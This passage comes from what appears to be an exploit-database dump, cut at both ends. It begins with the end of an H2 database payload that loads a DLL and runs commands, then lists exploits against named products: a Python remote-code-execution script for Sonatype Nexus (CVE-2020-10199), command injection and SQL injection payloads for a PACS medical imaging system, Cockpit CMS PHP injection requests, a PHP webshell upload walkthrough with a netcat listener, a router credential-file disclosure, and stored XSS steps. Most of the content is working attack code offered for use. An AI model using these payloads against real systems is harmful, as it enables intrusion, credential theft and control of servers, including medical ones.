(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x2a),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x78),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x2c),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x49),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0xa7),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x98),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0xc0),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0xe1),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0xa8),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0xe4),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x34),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x34),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0x4a),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0xac),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0xd0),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0xd0),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0x03),CHAR(0x16),CHAR(0x00),CHAR(0x00),CHAR(0x44),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x16),CHAR(0x00),CHAR(0x00),CHAR(0x41),CHAR(0x16),CHAR(0x00),CHAR(0x00),CHAR(0x74),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x44),CHAR(0x16),CHAR(0x00),CHAR(0x00),CHAR(0x78),CHAR(0x16),CHAR(0x00),CHAR(0x00),CHAR(0x98),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x78),CHAR(0x16),CHAR(0x00),CHAR(0x00),CHAR(0x49),CHAR(0x17),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x17),CHAR(0x00),CHAR(0x00),CHAR(0xbd),CHAR(0x17),CHAR(0x00),CHAR(0x00),CHAR(0x8c),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0xc0),CHAR(0x17),CHAR(0x00),CHAR(0x00),CHAR(0x6c),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x6c),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0x8f),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0xbc),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0xd7),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0xd8),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0x11),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x14),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0x5d),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x60),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0x88),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x88),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0x9d),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0xd4),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0x44),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x44),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0x8d),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0x98),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x90),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0x1b),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0x98),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x1c),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0xb2),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0xac),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0xb4),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0xd8),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0x98),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0xd8),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x1c),CHAR(0x00),CHAR(0x00),CHAR(0x98),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x14),CHAR(0x1c),CHAR(0x00),CHAR(0x00),CHAR(0x5e),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x60),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0x9c),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0xf8),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x9c),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0xd8),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0xf8),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0xdc),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0x7d),CHAR(0x1f),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x18),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x19),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x19),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x32),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x32),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x46),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x46),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x7c),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x6c),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x7c),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x94),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0xcc),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0x24),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0xa0),CHAR(0xf0),CHAR(0xa0),CHAR(0xf8),CHAR(0xa0),CHAR(0x00),CHAR(0xa1),CHAR(0x08),CHAR(0xa1),CHAR(0xc8),CHAR(0xa4),CHAR(0xd0),CHAR(0xa4),CHAR(0x68),CHAR(0xa5),CHAR(0x80),CHAR(0xa5),CHAR(0x88),CHAR(0xa5),CHAR(0x28),CHAR(0xa6),CHAR(0x30),CHAR(0xa6),CHAR(0x38),CHAR(0xa6),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),'"'), 'ISO-8859-1', '', '', '', '', '');
-- Load native library
CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load";
CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll');
-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()');
# Exploit Title: iBall-Baton WRA150N Rom-0 Backup - File Disclosure (Sensitive Information)
# Date: 07/01/2021
# Exploit Author: h4cks1n
# Vendor Homepage: iball.co.in
# Version: iBall-Baton WRA150N
#Tested on : Windows 7/8/8.1/10, Parrot Linux OS
# The iBall-Baton router version WRA150N is vulnerable to the Rom-0
Extraction exploit.
The rom-0 is a file which contains the ADSL Login credentials.
In the case of this router the access to this file is unusually not
encrypted.
The file can be accessed by following methods:
Method 1 : Type the WiFi IP address in the browser followed by /rom-0 (For
example - 192.168.1.1/rom-0). The rom-0 file will be downloaded. The file
is obfuscated,however.It needs to be deobfuscated using online decryptors
#Online Rom-0 decryptor - http://www.routerpwn.com/zynos/
#Offline Rom-0 decryptor - https://github.com/rootkick/Rom-0-Decoder
Method 2: (Linux)
This full process can be automated by using threat 9's routersploit
Routersploit Download- https://github.com/threat9/routersploit
Download and run routersploit and use router/multi/rom-0 module
# Exploit Title: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
# Exploit Author: 1F98D
# Original Author: Alvaro Muñoz
# Date: 27 May 2020
# Vendor Hompage: https://www.sonatype.com/
# CVE: CVE-2020-10199
# Tested on: Windows 10 x64
# References:
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
#
# Nexus Repository Manager 3 versions 3.21.1 and below are vulnerable
# to Java EL injection which allows a low privilege user to remotely
# execute code on the target server.
#
#!/usr/bin/python3
import sys
import base64
import requests
URL='http://192.168.1.1:8081'
CMD='cmd.exe /c calc.exe'
USERNAME='admin'
PASSWORD='password'
s = requests.Session()
print('Logging in')
body = {
'username': base64.b64encode(USERNAME.encode('utf-8')).decode('utf-8'),
'password': base64.b64encode(PASSWORD.encode('utf-8')).decode('utf-8')
}
r = s.post(URL + '/service/rapture/session',data=body)
if r.status_code != 204:
print('Login unsuccessful')
print(r.status_code)
sys.exit(1)
print('Logged in successfully')
body = {
'name': 'internal',
'online': True,
'storage': {
'blobStoreName': 'default',
'strictContentTypeValidation': True
},
'group': {
'memberNames': [
'$\\A{\'\'.getClass().forName(\'java.lang.Runtime\').getMethods()[6].invoke(null).exec(\''+CMD+'\')}"'
]
},
}
r = s.post(URL + '/service/rest/beta/repositories/go/group', json=body)
if 'java.lang.ProcessImpl' in r.text:
print('Command executed')
sys.exit(0)
else:
print('Error executing command, the following was returned by Nexus')
print(r.text)
# Exploit Title: ECSIMAGING PACS 6.21.5 - Remote code execution
# Date: 06/01/2021
# Exploit Author: shoxxdj
# Vendor Homepage: https://www.medicalexpo.fr/
# Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )
# Tested on: Linux
ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability.
The parameter "file" on the webpage /showfile.php can be exploited with simple OS injection to gain root access.
www-data user has sudo NOPASSWD access :
/showfile.php?file=/etc/sudoers
[...]
www-data ALL=NOPASSWD: ALL
[...]
Command injection can be realized with the $IFS tricks : <url>/showfile.php?file=;ls$IFS-la$IFS/
/showfile.php?file=;sudo$IFS-l
[...]
User www-data may run the following commands on this host:
(root) NOPASSWD: ALL
[...]
# Cockpit CMS 0.6.1 - Remote Code Execution
# Product: Cockpit CMS (https://getcockpit.com)
# Version: Cockpit CMS < 0.6.1
# Vulnerability Type: PHP Code Execution
# Exploit Author: Rafael Resende
# Attack Type: Remote
# Vulnerability Description
# Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06.
# Exploit Login
POST /auth/check HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Content-Length: 52
Origin: https://example.com
{"auth":{"user":"test'.phpinfo().'","password":"b"}}
# Exploit Password reset
POST /auth/requestreset HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Content-Length: 28
Origin: https://example.com
{"user":"test'.phpinfo().'"}
## Impact
Allows attackers to execute malicious codes to get access to the server.
## Fix
Update to versions >= 0.6.1
# Exploit Title: Employee Record System 1.0 - Unrestricted File Upload to Remote Code Execution
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2021-01-05
# Vendor Homepage: https://www.sourcecodester.com/php/14588/employee-record-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14588&title=Employee+Record+System+in+PHP%2FMySQLi+with+Full+Source+Code
# Affected Version: Version 1
# Tested on: Parrot OS
Step 1: Log in to the CMS with any valid user credentials.
Step 2: Click on add Employee.
Step 3: Copy a php webshell from /usr/share/webshells/php/php-reverse-shell.php and rename it to shell.php.jpg or embed a phpshellcode into an image using "exiftool -Comment='<?php system($_GET['cmd']); ?>' r0b0t.jpg, then rename the image to r0b0t.php.jpg
Step 4: Fill in the required details at Add Employee, to Upload Employee Photo, browse select the shell.php.jpg / r0b0t.php.jpg from your computer.
Step 5: Click upload and capture request in burpsuite. In burpsuite, find your uploaded file and rename it to a ".php" extenstion.
-----------------------------32746377659244340001584064316
Content-Disposition: form-data; name="employee_photo"; filename="r0b0t.php"
Content-Type: image/jpeg
------------------------------------------
Step 6: Forward the request in burpsuite and apply same technique to Upload Employee ID.
step 7: Once all webshells/payloads are uploaded in both "Upload Employee Photo" & "Upload Employee ID" fields, click on ADD RECORD to create the record.
Step 8: Navigate to All employees, click on view employee icon, once the page loads, start nc listener, right click on the employee icon, copy the image location and paste that in browser. You will either have a shell in nc listener or a full RCE through the uploaded image (http://localhost/record/uploads/employees_photos/gQZtGSJyYW4oijD_r0b0t.php?cmd=ls)
# Exploit Title: Curfew e-Pass Management System 1.0 - Stored XSS
# Date: 2/1/2021
# Exploit Author: Arnav Tripathy
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10/Wamp
1) Log into the application
2) Click on pass then click add a pass
3) Put <script>alert(1)</script> in the Full name parameter , rest all fill whatever you want.
4) Now go to manage passes, view the pass you just created.
5) You'll get popup of alert
# Exploit Title: ECSIMAGING PACS 6.21.5 - SQL injection
# Date: 06/01/2021
# Exploit Author: shoxxdj
# Vendor Homepage: https://www.medicalexpo.fr/
# Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )
# Tested on: Linux
ECSIMAGING PACS Application in 6.21.5 and bellow suffers from SQLinjection vulnerability
The parameter email is sensitive to SQL Injection (selected_db can be leaked in the parameters )
Payload example : /req_password_user.php?email=test@test.com' OR NOT 9856=9856-- nBwf&selected_db=xtp001
/req_password_user.php?email=test@test.com'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+&selected_db=xtp001
SQLMAP : sqlmap.py -u '<URL>/req_password_user.php?email=test@test.com&selected_db=xtp001' --risk=3 --level=5
# Exploit Title: Life Insurance Management System 1.0 - Multiple Stored XSS
# Date: 4/1/2021
# Exploit Author: Arnav Tripathy
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html
# Version: 1.0
# Tested on: linux / Lamp
Click on add payment once logged in. Put <script>alert(1)</script> and so on in all parameters. You will notice popup once you navigate to payments.
# Exploit Title: CRUD Operation 1.0 - Multiple Stored XSS
# Date: 4/1/2021
# Exploit Author: Arnav Tripathy
# Vendor Homepage: https://egavilanmedia.com
# Software Link: https://egavilanmedia.com/crud-operation-with-php-mysql-bootstrap-and-dompdf/
# Version: 1.0
# Tested on: linux / Lamp
